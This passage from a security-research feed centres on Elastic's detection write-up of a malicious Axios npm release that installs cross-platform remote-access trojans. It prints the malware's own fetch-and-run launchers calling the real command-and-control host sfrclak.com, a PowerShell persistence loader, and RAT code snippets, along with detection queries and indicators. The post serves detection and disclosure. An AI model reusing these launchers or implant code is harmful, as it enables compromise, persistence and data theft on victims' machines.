<li><a href="https://attack.mitre.org/techniques/T1071/001/">Application Layer Protocol: Web Protocols</a></li>
<li><a href="https://attack.mitre.org/techniques/T1571/">Non-Standard Port</a></li>
<li><a href="https://attack.mitre.org/techniques/T1132/001/">Data Encoding: Standard Encoding</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
</ul>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>6202033.ps1</code></td>
<td align="left">Windows payload</td>
</tr>
<tr>
<td align="left"><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>com.apple.act.mond</code></td>
<td align="left">macOS payload</td>
</tr>
<tr>
<td align="left"><code>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>ld.py</code></td>
<td align="left">Linux payload</td>
</tr>
<tr>
<td align="left"><code>sfrclak[.]com</code></td>
<td align="left">Domain</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
<tr>
<td align="left"><code>142.11.206[.]73</code></td>
<td align="left">IPv4</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
</tbody>
</table>
<h2>References</h2>
<p>The following resources were referenced throughout this research:</p>
<ul>
<li><a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/axios-one-rat-to-rule-them-all.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic releases detections for the Axios supply chain compromise]]></title>
            <link>https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</link>
            <guid>axios-supply-chain-compromise-detections</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Hunting and detection rules for the Elastic-discovered Axios supply chain compromise.]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs is releasing an initial triage and detection rules for the Axios supply-chain compromise. We have <a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">released a detailed analysis</a> on the Axios compromise RAT and payloads.</p>
</blockquote>
<blockquote>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on March 31, 2026 at 01:50 AM UTC to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
</blockquote>
<h2>Introduction</h2>
<p>We are currently tracking a supply chain attack involving malicious Axios package versions that introduce a secondary dependency used for post-install execution. Rather than embedding malicious logic directly into the primary package, the attacker leveraged a transitive dependency to trigger execution during installation and deploy a cross-platform payload.</p>
<p>Elastic observed consistent execution patterns across impacted systems immediately after <code>npm install</code> of the malicious Axios versions (<code>1.14.1</code>, <code>0.30.4</code>). The added dependency (<code>plain-crypto-js@4.2.1</code>) executed during <code>postinstall</code> and was quickly followed by a second-stage payload.</p>
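For responders, the compromised versions above can be checked against an npm v2/v3 lockfile. The helper below is a hypothetical sketch, not an official tool:
<pre><code class="language-py"># Hypothetical audit helper: scan a package-lock.json (v2/v3 'packages'
# map) for the compromised releases named in this post.
import json

COMPROMISED = {
    ('axios', '1.14.1'),
    ('axios', '0.30.4'),
    ('plain-crypto-js', '4.2.1'),
}

def find_compromised(lockfile_path):
    '''Return (name, version) pairs from the lockfile matching known-bad releases.'''
    with open(lockfile_path) as fh:
        lock = json.load(fh)
    hits = []
    for path, meta in lock.get('packages', {}).items():
        # lockfile keys look like '' (the root) or 'node_modules/axios'
        name = path.rsplit('node_modules/', 1)[-1]
        if (name, meta.get('version')) in COMPROMISED:
            hits.append((name, meta.get('version')))
    return hits
</code></pre>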
<p>Across Linux, Windows, and macOS, the activity followed the same structure:</p>
<pre><code>node (npm install)
  → OS-native execution (sh / cscript / osascript)
    → remote payload retrieval
      → backgrounded or hidden execution of stage 2
</code></pre>
<p>This results in a small but high-signal window where:</p>
<ul>
<li><code>node</code> spawns a shell or interpreter</li>
<li>a remote payload is fetched</li>
<li>execution is detached from the original process</li>
</ul>
<p>Elastic detections triggered reliably on this behavior across platforms, providing strong coverage of the delivery stage.</p>
<h2>How Elastic Detects the Supply Chain Attack</h2>
<p>This activity consistently appears in process telemetry as a Node.js process spawning an OS-native execution path to retrieve and execute a remote payload, often in a detached or hidden context. Elastic detections focus on this behavior rather than static indicators, providing reliable coverage of the delivery stage across platforms.</p>
<h3>Linux</h3>
<p>The Linux execution path is the cleanest place to start, because the malware does very little to hide what it is doing. We observed that the delivery stage produced exactly the kind of process ancestry you would expect from a compromised dependency:</p>
<pre><code>node → /bin/sh -c curl -o /tmp/ld.py ... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;
</code></pre>
<p>Which shows up as follows:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image6.png" alt="Elastic alerts triggering on backdoor execution" /></p>
<p>The initial signal comes from the Node.js process, handing off execution to a shell that performs a remote fetch. This is captured by the <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via Node.js</a> detection rule.</p>
<pre><code>event.category:process and
process.parent.name:(&quot;node&quot; or &quot;bun&quot; or &quot;node.exe&quot; or &quot;bun.exe&quot;) and 
(
  (
    process.name:(
      &quot;bash&quot; or &quot;dash&quot; or &quot;sh&quot; or &quot;tcsh&quot; or &quot;csh&quot; or  &quot;zsh&quot; or &quot;ksh&quot; or
      &quot;fish&quot; or &quot;cmd.exe&quot; or &quot;bash.exe&quot; or &quot;powershell.exe&quot;
    ) and
    process.command_line:(*curl*http* or *wget*http*)
  ) or 
  process.name:(&quot;curl&quot; or &quot;wget&quot; or &quot;curl.exe&quot; or &quot;wget.exe&quot;)
)
</code></pre>
<p>This captures the moment when the installation flow deviates from normal package behavior and begins pulling a payload over HTTP. In this case, it is the <code>curl</code> invocation that retrieves <code>/tmp/ld.py</code> from the remote server.</p>
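The rule’s core logic can be approximated in Python for testing against sample process events; the authoritative version is the query above, and the dict keys in this sketch simply mirror the ECS field names it references.
<pre><code class="language-py"># Illustrative approximation of the Curl or Wget Spawned via Node.js rule.
NODE_PARENTS = {'node', 'bun', 'node.exe', 'bun.exe'}
SHELLS = {'bash', 'dash', 'sh', 'tcsh', 'csh', 'zsh', 'ksh', 'fish',
          'cmd.exe', 'bash.exe', 'powershell.exe'}
FETCHERS = {'curl', 'wget', 'curl.exe', 'wget.exe'}

def fetches_over_http(cmd, tool):
    # mirrors the *tool*http* wildcard: tool name followed later by 'http'
    i = cmd.find(tool)
    return i != -1 and 'http' in cmd[i:]

def matches_curl_via_node(ev):
    if ev.get('event.category') != 'process':
        return False
    if ev.get('process.parent.name') not in NODE_PARENTS:
        return False
    if ev.get('process.name') in FETCHERS:
        return True
    cmd = ev.get('process.command_line', '').lower()
    return ev.get('process.name') in SHELLS and (
        fetches_over_http(cmd, 'curl') or fetches_over_http(cmd, 'wget'))
</code></pre>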
<p>Shortly after, execution continues in the same shell, but now the focus shifts from retrieval to execution. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a>.</p>
<pre><code>event.category:process and event.type:start and
process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and
process.args:(-c and *&amp;)
</code></pre>
<p>Which captures the second half of the chain:</p>
<pre><code>sh -c &quot;... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;&quot;
</code></pre>
<p>The payload is launched with <code>nohup</code> and backgrounded immediately using <code>&amp;</code>, detaching it from the parent process and suppressing output. That transition from a short-lived install-time shell into a detached long-running process is where the actual implant takes over.</p>
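The backgrounding behavior the rule above targets can likewise be sketched as a predicate over a process-start event; this is an illustrative approximation, not the shipped rule logic.
<pre><code class="language-py"># Illustrative approximation: a shell started with -c whose command
# string ends in a trailing ampersand (a detached, backgrounded command).
SHELL_NAMES = {'bash', 'csh', 'dash', 'fish', 'ksh', 'sh', 'tcsh', 'zsh'}
AMPERSAND = chr(38)  # trailing ampersand detaches the command from its parent

def matches_backgrounded(ev):
    if ev.get('event.category') != 'process' or ev.get('event.type') != 'start':
        return False
    args = ev.get('process.args', [])
    return (ev.get('process.name') in SHELL_NAMES
            and '-c' in args
            and any(a.rstrip().endswith(AMPERSAND) for a in args))
</code></pre>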
<p>After execution, the Linux second stage is a Python-based RAT that establishes a simple polling loop to its C2. The entrypoint <code>work()</code> sends an initial <code>FirstInfo</code> message and then transitions into <code>main_work()</code>, which continuously reports host data and processes tasking:</p>
<pre><code class="language-py">while True:
    ps = print_process_list()

    data = {
        &quot;hostname&quot;: get_host_name(),
        &quot;username&quot;: get_user_name(),
        &quot;os&quot;: os,
        &quot;processList&quot;: ps
    }

    response_content = send_result(url, body)

    if response_content:
        process_request(url, uid, response_content)

    time.sleep(60)
</code></pre>
<p>On first check-in, it performs a targeted directory enumeration via <code>init_dir_info()</code> across user paths such as <code>$HOME</code>, <code>.config</code>, <code>Documents</code>, and <code>Desktop</code>, and builds a process listing directly from <code>/proc</code>, including usernames and start times.</p>
<p>Tasking is minimal but flexible. <code>runscript</code> supports arbitrary shell execution or base64-delivered Python via <code>python3 -c</code>, while <code>peinject</code> simply writes attacker-supplied bytes to a hidden file in <code>/tmp</code> and executes it:</p>
<pre><code class="language-py">file_path = f&quot;/tmp/.{generate_random_string(6)}&quot;
with open(file_path, &quot;wb&quot;) as file:
    file.write(payload)

os.chmod(file_path, 0o777)
subprocess.Popen([file_path] + shlex.split(param.decode(&quot;utf-8&quot;)))
</code></pre>
<p>This provides the operator with a lightweight access implant for periodic host profiling, command execution, and follow-on payload delivery.</p>
<p>Together, these detections provide strong coverage of the Linux delivery stage and the transition into the Python backdoor, without relying on specific filenames or hardcoded indicators:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via Node.js</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></li>
</ul>
<h3>Windows</h3>
<p>The Windows execution path follows the same pattern: it uses <code>curl</code> to download a remote PowerShell script and proxies execution via a renamed PowerShell binary (<code>C:\ProgramData\wt.exe</code>). The following alert shows the process chain:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image5.png" alt="Elastic - Alert Process Tree" title="Elastic - Alert Process Tree" /></p>
<p>Where:</p>
<ul>
<li><code>wt.exe</code> is a renamed copy of <code>PowerShell.exe</code> located in <code>C:\ProgramData\wt.exe</code></li>
<li><code>curl</code> is used to retrieve a remote PowerShell script</li>
<li>execution is performed via the renamed binary</li>
</ul>
<p>We first observe the creation and use of the renamed interpreter. This is captured by <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a>, which flags signed system binaries executed from unexpected locations.</p>
<p>Shortly after, the same binary is used to retrieve the second-stage payload over HTTP. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a>, capturing the network retrieval stage driven from the scripted execution chain.</p>
<p>The second stage is a PowerShell-based RAT that beacons to its C2 (<code>http[:]//sfrclak[.]com:8000/</code>) every 60 seconds over HTTP using a fake IE8 User-Agent and base64-encoded JSON.</p>
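Because the beacon body is plain base64-encoded JSON, a captured request can be recovered directly during triage. The envelope shape in this sketch is an assumption for illustration:
<pre><code class="language-py"># Triage sketch: decode a captured base64 beacon body back into JSON.
# The exact message envelope is an assumption for illustration.
import base64
import json

def decode_beacon(body):
    '''Decode a captured base64 HTTP request body into its JSON payload.'''
    return json.loads(base64.b64decode(body).decode('utf-8'))
</code></pre>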
<p>It establishes persistence via a <code>Run\MicrosoftUpdate</code> registry key that executes a hidden batch script, <code>C:\ProgramData\system.bat</code>.</p>
<p>The batch file dynamically retrieves and executes the payload in memory on login:</p>
<pre><code>start /min powershell -w h -c &quot;
([scriptblock]::Create(
  [System.Text.Encoding]::UTF8.GetString(
    (Invoke-WebRequest -UseBasicParsing -Uri '' -Method POST -Body 'packages.npm.org/product1').Content
  )
)) ''&quot;
</code></pre>
<p>Its core capabilities include:</p>
<ul>
<li><strong>peinject</strong> - in-memory .NET assembly injection using <code>Assembly.Load(byte[])</code> for process hollowing into <code>cmd.exe</code>.</li>
<li><strong>runscript</strong> - arbitrary PowerShell script execution via encoded commands or temp files.</li>
<li><strong>rundir</strong> - filesystem enumeration of user directories and all drive roots.</li>
</ul>
<p>On initialization, it fingerprints the host via WMI, collecting hostname, username, OS version, CPU, hardware model, timezone, boot/install times, and a full process listing. It then sends an initial directory listing of Documents, Desktop, OneDrive, and AppData before entering its beacon loop.</p>
<p>The second stage triggers both the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a> alerts:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image2.png" alt="" /></p>
<p>The <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a> rule captures the PowerShell RAT script content:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image1.png" alt="" /></p>
<p>Taken together, these detections capture the full Windows delivery chain, from renamed binary execution to payload retrieval, persistence, and in-memory execution, via the following behavioral detections:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></li>
</ul>
<h3>macOS</h3>
<p>Analysis shows the loader writes AppleScript to a temp file, runs it via <code>osascript</code>, then downloads the second stage to an Apple-masquerading cache path and launches it through <code>/bin/zsh</code>. The key launcher looks like this:</p>
<pre><code>do shell script &quot;curl -o /Library/Caches/com.apple.act.mond \
 -d packages.npm.org/product0 \
 -s http://sfrclak.com:8000/6202033 \
 &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond \
 &amp;&amp; /bin/zsh -c \&quot;/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;\&quot; \ &amp;&gt; /dev/null&quot;
</code></pre>
<p>The delivered file produced the following alert, matching on the file name masquerading attempt and the self-signed code signature:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image3.png" alt="Elastic Defend behavior alert triggering on the macOS backdoor" title="Elastic Defend behavior alert triggering on the macOS backdoor" /></p>
<p>The payload path itself triggers the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a> endpoint rules, as it mimics Apple naming conventions (<code>com.apple.*</code>) but does not match expected signing characteristics.</p>
<p><code>com.apple.act.mond</code> is a custom-built macOS backdoor compiled as a universal Mach-O binary (x86_64 and ARM64) using C++ and Xcode, with HTTP-based C2 communications via <code>libcurl</code> and a JSON command protocol.</p>
<p>On initial check-in, it fingerprints the host, collecting hostname, username, OS version, hardware model, timezone, and a full process listing (<code>ps -eo user,pid,command</code>). The process enumeration surfaces via the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a> endpoint rule, which captures unexpected child process activity originating from the backdoor:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image4.png" alt="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" title="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" /></p>
<p>The macOS backdoor facilitates:</p>
<ul>
<li>C2 connection by passing a URL directly as an argument</li>
<li>AppleScript execution using <code>osascript</code> via temporary hidden <code>.scpt</code> files dropped to <code>/tmp/</code></li>
<li>Filesystem enumeration targeting <code>/Applications</code> and <code>~/Library/Application Support</code></li>
<li>Downloading and executing remote base64-encoded payloads</li>
<li>Ad-hoc code signing of dropped payloads (<code>codesign --force --deep --sign - &quot;/private/tmp/.*&quot;</code>) so they can run past Gatekeeper</li>
</ul>
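The ad-hoc signing capability above can be hunted with a simple command-line check; this is an illustrative sketch, and the path and argument shapes are assumptions based on the invocation described in this post.
<pre><code class="language-py"># Hunting sketch: flag ad-hoc codesign invocations ('--sign' with a bare
# dash identity) targeting files under /private/tmp.
def is_adhoc_tmp_codesign(command_line):
    toks = command_line.split()
    if not toks or toks[0] != 'codesign':
        return False
    if '--sign' not in toks:
        return False
    i = toks.index('--sign')
    # a bare '-' identity after --sign denotes ad-hoc signing
    adhoc = i != len(toks) - 1 and toks[i + 1] == '-'
    return adhoc and any(t.startswith('/private/tmp/') for t in toks)
</code></pre>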
<p>The binary is not packed or obfuscated, ships with debug entitlements enabled, retains developer build paths (<code>Jain_DEV/client_mac/macWebT</code>), and uses a spoofed IE8/Windows XP user-agent string (<code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code>).</p>
<p>These detections collectively follow the macOS delivery path from staged AppleScript execution to payload launch and post-execution behavior:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></li>
</ul>
<h2>Conclusion</h2>
<p>This supply chain attack highlights how little complexity is required to achieve cross-platform compromise when execution is triggered during installation.</p>
<p>Across Linux, Windows, and macOS, we consistently observed the same core pattern: a Node.js process spawning native OS execution to retrieve and launch a remote payload, followed by immediate detachment or hidden execution.</p>
<p>From a detection perspective, the key takeaway is that the most reliable signals are not in the package itself, but in what happens immediately after installation. Process ancestry, network retrieval, and detached execution provide a stable detection surface that remains effective even when payloads, filenames, or infrastructure change.</p>
<p>Elastic detections focused on this behavior provided consistent coverage of the delivery stage across all platforms, without relying on static indicators.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Related Alerts</h3>
<table>
<thead>
<tr>
<th align="left">Alert</th>
<th align="left">Operating System</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via Node.js</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></td>
<td align="left">macOS</td>
</tr>
</tbody>
</table>
<h3>Malicious Packages</h3>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
<th>Hash (shasum)</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios</code></td>
<td><code>1.14.1</code></td>
<td><code>2553649f232204966871cea80a5d0d6adc700ca</code></td>
</tr>
<tr>
<td><code>axios</code></td>
<td><code>0.30.4</code></td>
<td><code>d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71</code></td>
</tr>
<tr>
<td><code>plain-crypto-js</code></td>
<td><code>4.2.1</code></td>
<td><code>07d889e2dadce6f3910dcbc253317d28ca61c766</code></td>
</tr>
</tbody>
</table>
<p>Additional related packages observed in the ecosystem abuse:</p>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>@shadanai/openclaw</code></td>
<td><code>2026.3.28-2</code>, <code>2026.3.28-3</code>, <code>2026.3.31-1</code>, <code>2026.3.31-2</code></td>
</tr>
<tr>
<td><code>@qqbrowser/openclaw-qbot</code></td>
<td><code>0.0.130</code></td>
</tr>
</tbody>
</table>
<h3>Script / Payload Hashes (SHA256)</h3>
<table>
<thead>
<tr>
<th>File</th>
<th>SHA256</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>setup.js</code></td>
<td><code>e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</code></td>
</tr>
<tr>
<td><code>/tmp/ld.py</code></td>
<td><code>6483c004e207137385f480909d6edecf1b699087378aa91745ecba7c3394f9d7</code></td>
</tr>
<tr>
<td><code>6202033.ps1</code></td>
<td><code>ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</code></td>
</tr>
<tr>
<td><code>system.bat</code></td>
<td><code>e49c2732fb9861548208a78e72996b9c3c470b6b562576924bcc3a9fb75bf9ff</code></td>
</tr>
<tr>
<td><code>com.apple.act.mond</code></td>
<td><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
</tr>
</tbody>
</table>
<h3>Network Indicators</h3>
<table>
<thead>
<tr>
<th>Type</th>
<th>Indicator</th>
</tr>
</thead>
<tbody>
<tr>
<td>C2 Domain</td>
<td><code>sfrclak[.]com</code></td>
</tr>
<tr>
<td>C2 IP</td>
<td><code>142.11.206[.]73</code></td>
</tr>
<tr>
<td>C2 URL</td>
<td><code>http://sfrclak[.]com:8000/6202033</code></td>
</tr>
<tr>
<td>User-Agent</td>
<td><code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></td>
</tr>
<tr>
<td>macOS POST body</td>
<td><code>packages[.]npm[.]org/product0</code></td>
</tr>
<tr>
<td>Windows POST body</td>
<td><code>packages[.]npm[.]org/product1</code></td>
</tr>
<tr>
<td>Linux POST body</td>
<td><code>packages[.]npm[.]org/product2</code></td>
</tr>
</tbody>
</table>
<h3>File System Indicators</h3>
<h4>Cross-platform</h4>
<table>
<thead>
<tr>
<th>Path / Artifact</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>$TMPDIR/6202033</code></td>
<td>Temporary staging artifact</td>
</tr>
<tr>
<td><code>*/node_modules/plain-crypto-js/setup.js</code></td>
<td>Node.js first-stage dropper</td>
</tr>
</tbody>
</table>
<h4>Linux</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/tmp/ld.py</code></td>
<td>Python RAT second stage</td>
</tr>
</tbody>
</table>
<h4>Windows</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>%PROGRAMDATA%\wt.exe</code></td>
<td>Renamed <code>powershell.exe</code> (execution proxy)</td>
</tr>
<tr>
<td><code>%PROGRAMDATA%\system.bat</code></td>
<td>Persistence launcher</td>
</tr>
<tr>
<td><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate</code></td>
<td>Persistence key</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.vbs</code></td>
<td>VBS launcher (self-deletes)</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.ps1</code></td>
<td>PowerShell payload (self-deletes)</td>
</tr>
</tbody>
</table>
<h4>macOS</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Mach-O backdoor payload</td>
</tr>
<tr>
<td><code>/tmp/*.scpt</code></td>
<td>Temporary AppleScript launcher</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/axios-supply-chain-compromise-detections.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Investigating from the Endpoint Across Your Environment with Elastic Security XDR]]></title>
            <link>https://www.elastic.co/security-labs/investigating-from-the-endpoint-across-your-environment</link>
            <guid>investigating-from-the-endpoint-across-your-environment</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article highlights how Elastic Security XDR unifies endpoint protection with multi-domain security analytics to help analysts trace and contain multi-stage attacks across hybrid and cloud environments.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Security investigations rarely stay confined to a single host. Today’s attackers increasingly use automation and AI to compress multi-stage attacks, turning what once unfolded over days into coordinated activity across endpoints, identities, workloads, and cloud services within minutes.</p>
<p>While many attacks begin on an endpoint, investigators must quickly determine how that activity spreads across the environment. In many environments, per-endpoint licensing limits how broadly protection and telemetry can be deployed, creating protection gaps during these investigations.</p>
